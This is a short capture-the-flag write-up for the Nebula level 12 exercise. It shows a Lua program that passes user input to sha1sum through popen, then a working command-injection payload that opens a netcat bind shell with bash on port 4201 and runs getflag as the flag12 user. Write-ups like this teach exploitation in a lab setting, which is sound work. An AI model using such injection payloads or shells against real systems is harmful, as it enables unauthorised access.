This excercise is pretty easy. The password hash is calculated by passing a user controlled string to sha1sum
prog = io.popen("echo "..password.." | sha1sum", "r")
So let's inject some remote shell spawning code.
echo " dum ; mkfifo /tmp/pipe; nc -lk 4201 0</tmp/pipe | /bin/bash &>/tmp/pipe; echo dum " | nc localhost 50001
On a second shell logged in with level12 we can connect to this shell
level12@nebula:~$ nc localhost 4201
getflag
You have successfully executed getflag on a target account
id
uid=987(flag12) gid=987(flag12) groups=987(flag12)